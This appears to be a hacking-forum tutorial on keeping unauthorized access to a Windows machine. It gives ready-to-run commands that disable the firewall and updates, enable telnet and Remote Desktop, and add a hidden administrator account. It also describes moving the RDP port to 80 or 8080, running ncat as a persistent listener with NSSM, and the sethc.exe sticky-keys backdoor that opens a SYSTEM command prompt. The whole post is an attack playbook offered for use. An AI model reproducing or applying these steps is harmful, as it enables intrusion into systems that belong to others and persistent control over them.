USEFUL LINKS FOR MAINTAINING ACCESS Non-Sucking Service Manager // http://nssm.cc/ NCAT // http://nmap.org/ncat/ TUTORIAL I wrote a private tutorial on this a while ago and now I'm just going to publish it because no one else had something written as to-the-point and helpful as what I had written. 1. Run all of this shit: Code: sc config wuauserv start= disabled net stop wuauserv netsh firewall set opmode disable sc config tlntsvr start= auto net start telnet reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f net user support1 passwordA!1 /add net localgroup "Administrators" /add support1 net localgroup "Users" /del support1 reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v support1 /t REG_DWORD /d 0 /f reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system /v dontdisplaylastusername /t REG_DWORD /d 1 /f net user support1 passwordA!1 /add --- this line creates the user with the username of support1. I grabbed this from: http://www.windows-commandline.com/enable-remote-desktop-command-line/ 2. Make sure the Terminal Service is running because the Terminal Server is what Remote Desktop runs as. Do this stuff: You need to register to view spoilers! 3. Go ahead and try it, if it doesn't work try to reboot/restart the server and it should work or at least try stopping and starting the termservice. ADDITIONAL HELP Quote HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\TerminalServer\WinStations\RDP-Tcp\PortNumber Is the location of the Remote Desktop port, if you find a program that is running on port 8080 or even port 80 and switch over the Remote Desktop port to 80/8080... this bypasses the need to port forward and since by default you can't back-connect or reverse-connect using remote desktop, this makes sense. Lastly, use the NSSM to make ncat listen as a system service each time the computer starts up. This makes maintaining access very easy. Alternatively you may be interested in enabling the Remote Desktop service, change sethc.exe inside the Windows System files to sethcbk.exe and copy cmd.exe to sethc.exe -- you will now connect to remote desktop and so long as authentication before screen view isn't enabled, you will see an ACTUAL screen with a login box. Tap shift 5 times and enjoy having a cmd window open with system level access. A simple and silly Windows fail.